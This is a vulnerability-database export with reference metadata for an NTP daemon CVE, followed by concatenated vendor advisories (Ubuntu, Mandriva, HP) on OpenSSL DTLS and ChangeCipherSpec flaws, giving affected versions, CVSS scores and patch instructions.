"https://www.theregister.co.uk/2016/04/28/time_for_a_patch_six_vulns_fixed_in_ntp_daemon/" }, { "title": "Red Hat: CVE-2016-1547", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=red_hat_cve_database\u0026qid=cve-2016-1547" }, { "title": "Ubuntu Security Notice: ntp vulnerabilities", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=ubuntu_security_notice\u0026qid=usn-3096-1" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=e70fe4cd19746222a97e5da53d3d2b2a" }, { "title": "Siemens Security Advisories: Siemens Security Advisory", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=siemens_security_advisories\u0026qid=85311fa037162a48cd67fd63f52a6478" }, { "title": "Oracle Solaris Third Party Bulletins: Oracle Solaris Third Party Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_solaris_third_party_bulletins\u0026qid=976a4da35d55283870dbb31b88a6c655" }, { "title": "Oracle Linux Bulletins: Oracle Linux Bulletin - April 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_linux_bulletins\u0026qid=83bbd91f8369c8f064e6d68dac68400f" }, { "title": "Oracle: Oracle Critical Patch Update Advisory - July 2016", "trust": 0.1, "url": "https://vulmon.com/vendoradvisory?qidtp=oracle_advisories\u0026qid=3a04485ebb79f7fbc2472bf9af5ce489" }, { "title": "satellite-host-cve", "trust": 0.1, "url": "https://github.com/redhatsatellite/satellite-host-cve " } ], "sources": [ { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "problemtype_data": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/problemtype_data#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "problemtype": "CWE-20", "trust": 1.0 }, { "problemtype": "Incorrect input confirmation (CWE-20) [NVD Evaluation ]", "trust": 0.8 }, { "problemtype": " Illegal synchronization (CWE-821) [IPA Evaluation ]", "trust": 0.8 } ], "sources": [ { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "NVD", "id": "CVE-2016-1547" } ] }, "references": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/references#", "data": { "@container": "@list" }, "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": [ { "trust": 2.3, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-103-11" }, { "trust": 2.1, "url": "https://access.redhat.com/errata/rhsa-2016:1141" }, { "trust": 2.0, "url": "http://www.oracle.com/technetwork/topics/security/linuxbulletinapr2016-2952096.html" }, { "trust": 1.8, "url": "https://security.gentoo.org/glsa/201607-15" }, { "trust": 1.8, "url": "http://rhn.redhat.com/errata/rhsa-2016-1552.html" }, { "trust": 1.7, "url": "http://www.talosintelligence.com/reports/talos-2016-0081/" }, { "trust": 1.7, "url": "http://www.securityfocus.com/bid/88276" }, { "trust": 1.7, "url": "http://www.oracle.com/technetwork/topics/security/bulletinapr2016-2952098.html" }, { "trust": 1.7, "url": "http://www.securitytracker.com/id/1035705" }, { "trust": 1.7, "url": "http://www.debian.org/security/2016/dsa-3629" }, { "trust": 1.7, "url": "https://security.netapp.com/advisory/ntap-20171004-0002/" }, { "trust": 1.7, "url": "https://security.freebsd.org/advisories/freebsd-sa-16:16.ntp.asc" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-497656.pdf" }, { "trust": 1.7, "url": "https://cert-portal.siemens.com/productcert/pdf/ssa-211752.pdf" }, { "trust": 1.6, "url": "https://www.arista.com/en/support/advisories-notices/security-advisories/1332-security-advisory-19" }, { "trust": 1.2, "url": "https://www.kb.cert.org/vuls/id/718152" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#april_2016_ntp_4_2_8p7_security" }, { "trust": 0.8, "url": "http://support.ntp.org/bin/view/main/securitynotice#january_2016_ntp_4_2_8p6_securit" }, { "trust": 0.8, "url": "http://jvn.jp/vu/jvnvu91176422/" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu96269392/index.html" }, { "trust": 0.8, "url": "https://jvn.jp/vu/jvnvu95781418/index.html" }, { "trust": 0.8, "url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2016-1547" }, { "trust": 0.6, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1547" }, { "trust": 0.6, "url": "https://www.cybersecurity-help.cz/vdb/sb2021061008" }, { "trust": 0.6, "url": "https://us-cert.cisa.gov/ics/advisories/icsa-21-159-11" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1548" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7979" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1550" }, { "trust": 0.5, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2518" }, { "trust": 0.4, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8138" }, { "trust": 0.3, "url": "https://access.redhat.com/security/cve/cve-2016-1547" }, { "trust": 0.3, "url": "http://www.ntp.org/" }, { "trust": 0.3, "url": "https://tools.cisco.com/security/center/content/ciscosecurityadvisory/cisco-sa-20160428-ntpd" }, { "trust": 0.3, "url": "http://www.oracle.com/technetwork/security-advisory/cpujul2016-2881720.html" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1023885" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024073" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=isg3t1024157" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=nas8n1021521" }, { "trust": 0.3, "url": "http://support.ntp.org/bin/view/main/ntpbug3007 " }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21983803" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21985122" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21986956" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21988706" }, { "trust": 0.3, "url": "http://www-01.ibm.com/support/docview.wss?uid=swg21989542" }, { "trust": 0.3, "url": "http://aix.software.ibm.com/aix/efixes/security/ntp_advisory7.asc" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7978" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2516" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7974" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7977" }, { "trust": 0.3, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8158" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7973" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7975" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7976" }, { "trust": 0.2, "url": "https://www.redhat.com/mailman/listinfo/rhsa-announce" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2015-7979" }, { "trust": 0.2, "url": "https://bugzilla.redhat.com/):" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/key/" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1548" }, { "trust": 0.2, "url": "https://access.redhat.com/articles/11258" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-1550" }, { "trust": 0.2, "url": "https://access.redhat.com/security/cve/cve-2016-2518" }, { "trust": 0.2, "url": "https://access.redhat.com/security/updates/classification/#moderate" }, { "trust": 0.2, "url": "https://access.redhat.com/security/team/contact/" }, { "trust": 0.2, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7704" }, { "trust": 0.1, "url": "https://cwe.mitre.org/data/definitions/20.html" }, { "trust": 0.1, "url": "https://nvd.nist.gov" }, { "trust": 0.1, "url": "https://usn.ubuntu.com/3096-1/" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4956" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-0727" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4954" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p5+dfsg-3ubuntu2.14.04.10" }, { "trust": 0.1, "url": "http://www.ubuntu.com/usn/usn-3096-1" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-4955" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.6.p3+dfsg-1ubuntu3.11" }, { "trust": 0.1, "url": "https://launchpad.net/ubuntu/+source/ntp/1:4.2.8p4+dfsg-3ubuntu5.3" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7702" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1549" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7702" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7849" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7852" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7978" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8140" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7855" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7852" }, { "trust": 0.1, "url": "https://security.gentoo.org/" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1551" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2516" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7975" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7848" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8158" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4954" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4956" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7973" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7853" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7704" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8140" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8139" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4957" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7703" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7855" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4955" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7849" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7703" }, { "trust": 0.1, "url": "http://creativecommons.org/licenses/by-sa/2.5" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7705" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2517" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1548" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7691" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1547" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7854" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7853" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2519" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-2518" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7851" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7871" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7977" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7848" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-1550" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7850" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7701" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7692" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-8138" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7979" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7974" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2015-7851" }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2016-4953" }, { "trust": 0.1, "url": "https://bugs.gentoo.org." }, { "trust": 0.1, "url": "http://nvd.nist.gov/nvd.cfm?cvename=cve-2015-7976" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2516" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-7704" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1551" }, { "trust": 0.1, "url": "http://slackware.com" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2519" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2517" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-2519" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1547" }, { "trust": 0.1, "url": "http://slackware.com/gpg-key" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2015-8138" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2518" }, { "trust": 0.1, "url": "https://nvd.nist.gov/vuln/detail/cve-2016-1549" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1551" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1550" }, { "trust": 0.1, "url": "http://support.ntp.org/bin/view/main/securitynotice#recent_vulnerabilities" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-2517" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1548" }, { "trust": 0.1, "url": "http://osuosl.org)" }, { "trust": 0.1, "url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2016-1549" }, { "trust": 0.1, "url": "https://www.debian.org/security/faq" }, { "trust": 0.1, "url": "https://www.debian.org/security/" } ], "sources": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "BID", "id": "88276" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "sources": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#", "data": { "@container": "@list" } }, "data": [ { "db": "CERT/CC", "id": "VU#718152" }, { "db": "VULMON", "id": "CVE-2016-1547" }, { "db": "BID", "id": "88276" }, { "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137992" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "PACKETSTORM", "id": "136864" }, { "db": "PACKETSTORM", "id": "138052" }, { "db": "NVD", "id": "CVE-2016-1547" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "sources_release_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_release_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-27T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2017-01-06T00:00:00", "db": "VULMON", "id": "CVE-2016-1547" }, { "date": "2016-04-26T00:00:00", "db": "BID", "id": "88276" }, { "date": "2017-01-19T00:00:00", "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "date": "2016-10-05T22:33:00", "db": "PACKETSTORM", "id": "138984" }, { "date": "2016-08-03T18:16:52", "db": "PACKETSTORM", "id": "138162" }, { "date": "2016-07-21T15:56:23", "db": "PACKETSTORM", "id": "137992" }, { "date": "2016-05-31T13:33:49", "db": "PACKETSTORM", "id": "137244" }, { "date": "2016-05-02T21:38:58", "db": "PACKETSTORM", "id": "136864" }, { "date": "2016-07-26T19:19:00", "db": "PACKETSTORM", "id": "138052" }, { "date": "2017-01-06T21:59:00.320000", "db": "NVD", "id": "CVE-2016-1547" }, { "date": "2016-04-28T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "sources_update_date": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources_update_date#", "data": { "@container": "@list" } }, "data": [ { "date": "2016-04-28T00:00:00", "db": "CERT/CC", "id": "VU#718152" }, { "date": "2021-06-08T00:00:00", "db": "VULMON", "id": "CVE-2016-1547" }, { "date": "2016-11-24T01:07:00", "db": "BID", "id": "88276" }, { "date": "2021-06-10T09:01:00", "db": "JVNDB", "id": "JVNDB-2016-006648" }, { "date": "2021-11-17T22:15:47.330000", "db": "NVD", "id": "CVE-2016-1547" }, { "date": "2021-11-08T00:00:00", "db": "CNNVD", "id": "CNNVD-201604-602" } ] }, "threat_type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/threat_type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "remote", "sources": [ { "db": "PACKETSTORM", "id": "138984" }, { "db": "PACKETSTORM", "id": "138162" }, { "db": "PACKETSTORM", "id": "137244" }, { "db": "CNNVD", "id": "CNNVD-201604-602" } ], "trust": 0.9 }, "title": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/title#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "NTP.org ntpd contains multiple vulnerabilities", "sources": [ { "db": "CERT/CC", "id": "VU#718152" } ], "trust": 0.8 }, "type": { "@context": { "@vocab": "https://www.variotdbs.pl/ref/type#", "sources": { "@container": "@list", "@context": { "@vocab": "https://www.variotdbs.pl/ref/sources#" } } }, "data": "input validation error", "sources": [ { "db": "CNNVD", "id": "CNNVD-201604-602" } ], "trust": 0.6 } }
var-201406-0137
Vulnerability from variot
The dtls1_reassemble_fragment function in d1_both.c in OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly validate fragment lengths in DTLS ClientHello messages, which allows remote attackers to execute arbitrary code or cause a denial of service (buffer overflow and application crash) via a long non-initial fragment. Authentication is not required to exploit this vulnerability. The specific flaw exists within the handling of DTLS packets. The issue lies in the assumption that all fragments specify the same message size. An attacker could leverage this vulnerability to execute code in the context of the process using OpenSSL. The following are vulnerable: OpenSSL 0.9.8 prior to 0.9.8za OpenSSL 1.0.0 prior to 1.0.0m OpenSSL 1.0.1 prior to 1.0.1h. One of the patch backports for Ubuntu 10.04 LTS caused a regression for certain applications.
We apologize for the inconvenience. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-0195) Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. (CVE-2014-0224) Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled anonymous ECDH ciphersuites. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-3470)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.21
After a standard system update you need to reboot your computer to make all the necessary changes.
OpenSSL before 0.9.8za, 1.0.0 before 1.0.0m, and 1.0.1 before 1.0.1h does not properly restrict processing of ChangeCipherSpec messages, which allows man-in-the-middle attackers to trigger use of a zero-length master key in certain OpenSSL-to-OpenSSL communications, and consequently hijack sessions or obtain sensitive information, via a crafted TLS handshake, aka the CCS Injection vulnerability (CVE-2014-0224).
The updated packages have been upgraded to the 1.0.0m version where these security flaws has been fixed.
References:
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0195 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0221 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0224 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3470 http://www.openssl.org/news/secadv_20140605.txt
Updated Packages:
Mandriva Business Server 1/X86_64: 857d06ddc6423ad124b23eb760459033 mbs1/x86_64/lib64openssl1.0.0-1.0.0m-1.mbs1.x86_64.rpm d7436f2f95df5c1d64d44a745f125bd8 mbs1/x86_64/lib64openssl-devel-1.0.0m-1.mbs1.x86_64.rpm 67f6cd6da42f01fb2f6054a2f96872af mbs1/x86_64/lib64openssl-engines1.0.0-1.0.0m-1.mbs1.x86_64.rpm 5d7c5712c1ce70a2dd2596e803bc7004 mbs1/x86_64/lib64openssl-static-devel-1.0.0m-1.mbs1.x86_64.rpm 9866e03e1c112b0c4cb5587b142cfa63 mbs1/x86_64/openssl-1.0.0m-1.mbs1.x86_64.rpm 9ac714afa9a9b30419f2f1f5c9ec4e48 mbs1/SRPMS/openssl-1.0.0m-1.mbs1.src.rpm
To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you.
All packages are signed by Mandriva for security. You can obtain the GPG public key of the Mandriva Security Team by executing:
gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98
You can view other update advisories for Mandriva Linux at:
http://www.mandriva.com/en/support/security/advisories/
If you want to report vulnerabilities, please contact
security_(at)_mandriva.com
Type Bits/KeyID Date User ID
pub 1024D/22458A98 2000-07-10 Mandriva Security Team
iD8DBQFTlcuxmqjQ0CJFipgRAtEQAJsEeYwuETVPTeadp+pdK9wJfQqgOgCfXDif 30xyBHFmHJa6MS/00iqN2aY= =9sdw -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04355095
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04355095 Version: 1
HPSBMU03062 rev.1 - HP Insight Control server deployment on Linux and Windows running OpenSSL, Multiple Vulnerabilities
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-08-08 Last Updated: 2014-08-08
Potential Security Impact: Remote denial of service (DoS), code execution, unauthorized access, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH), HP Smart Update Manager (SUM), and HP Version Control Agent (VCA) running on Linux and Windows. These components of HP Insight Control server deployment could be exploited remotely resulting in denial of service (DoS), code execution, unauthorized access, or disclosure of information.
HP Insight Control server deployment packages HP System Management Homepage (SMH) and HP Version Control Agent (VCA), and HP Smart Update Manager (SUM) and deploys them through the following components. This bulletin provides the information needed to update the HP Insight Control server deployment solution.
Install HP Management Agents for Windows x86/x64 Install HP Management Agents for RHEL 5 x64 Install HP Management Agents for RHEL 6 x64 Install HP Management Agents for SLES 10 x64 Install HP Management Agents for SLES 11 x64 Upgrade Proliant Firmware
References:
CVE-2010-5298 Remote Denial of Service CVE-2014-0076 Unauthorized Disclosure of Information CVE-2014-0195 Remote Unauthorized Access CVE-2014-0198 Remote Denial of Service CVE-2014-0221 Remote Denial of Service (DoS) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information CVE-2014-3470 Remote Code Execution or Unauthorized Access SSRT101628
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control server deployment v7.1.2, v7.2.0, v7.2.1, v7.2.2, v7.3.1
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0076 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2014-0195 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0221 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 CVE-2014-3470 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION
HP has provided the following updates to v7.3.1 of HP Insight Control server deployment to resolve this vulnerability. HP has provided manual update steps if a version upgrade is not possible; if users wish to remain at v7.1.2, v7.2.0, or v7.2.1.
Note: It is important to check your current running version of HP Insight Control server deployment and to follow the correct steps listed below. For HP Insight Control server deployment v7.2.2, users must upgrade to v7.3.1 and follow the steps below to remove the vulnerability. The vulnerability known as Heartbleed (CVE-2014-0160) was fixed in HP Insight Control server deployment v7.3.1. That Security Bulletin with instructions on how to upgrade to v7.3.1 can be found here:
https://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_n a-c04267749
HP Insight Control server deployment users of v7.1.2, v7.2.0, v7.2.1 should take the following steps to remove this vulnerability.
Delete the files smhamd64-.exe/smhx86-.exe" from Component Copy Location listed in the following table, rows 1 and 2. Delete the files "vcax86-.exe/vcaamd64-.exe from Component Copy Location listed in the following table, rows 3 and 4. Delete the files hpsmh-7.*.rpm" from Component Copy Location listed in row 5. In sequence, perform the steps from left to right in the following table. First, download components from Download Link; Second, rename the component as suggested in Rename to. Third, copy the component to the location specified in Component Copy Location. Table Row Number Download Link Rename to Component Copy Location
1 http://www.hp.com/swpublishing/MTX-e8076c2a35804685ad65b2b1ba smhamd64-ccp023716.exe \express\hpfeatures\hpagents-ws\components\Win2008
2 http://www.hp.com/swpublishing/MTX-3395d737d98f42149125b9bb05 smhx86-cp023715.exe \express\hpfeatures\hpagents-ws\components\Win2008
3 http://www.hp.com/swpublishing/MTX-8aefeaf490284a7691eca97d13 vcax86-cp023742.exe \express\hpfeatures\hpagents-ws\components\Win2008
4 http://www.hp.com/swpublishing/MTX-c0d32bac154a4d93839d8cd1f2 vcaamd64-cp023743.exe \express\hpfeatures\hpagents-ws\components\Win2008
5 http://www.hp.com/swpublishing/MTX-bd9a1cf60e344c549c4888db93 Do not rename the downloaded component for this step. \express\hpfeatures\hpagents-sles11-x64\components \express\hpfeatures\hpagents-sles10-x64\components \express\hpfeatures\hpagents-rhel5-x64\components \express\hpfeatures\hpagents-rhel6-x64\components
Download and extract the HPSUM 5.3.6 component from ftp://ftp.hp.com/pub/softlib2/software1/pubsw-windows/p750586112/v99793
Copy all content from extracted ZIP folder and paste into \eXpress\hpfeatures\fw-proLiant\components Initiate Install HP Management Agents for SLES 11 x64 on targets running SLES11 x64. Initiate Install HP Management Agents for SLES 10 x64 on targets running SLES10 x64. Initiate Install HP Management Agents for RHEL 6 x64 on targets running RHEL 6 x64. Initiate Install HP Management Agents for RHEL 5 x64 on targets running RHEL 5 x64. Initiate Install HP Management Agents for Windows x86/x64 on targets running Windows.
HP Insight Control server deployment users with v7.2.2:
Please upgrade to Insight Control server deployment v7.3.1 and follow the steps below for v7.3.1.
HP Insight Control server deployment users with v7.3.1:
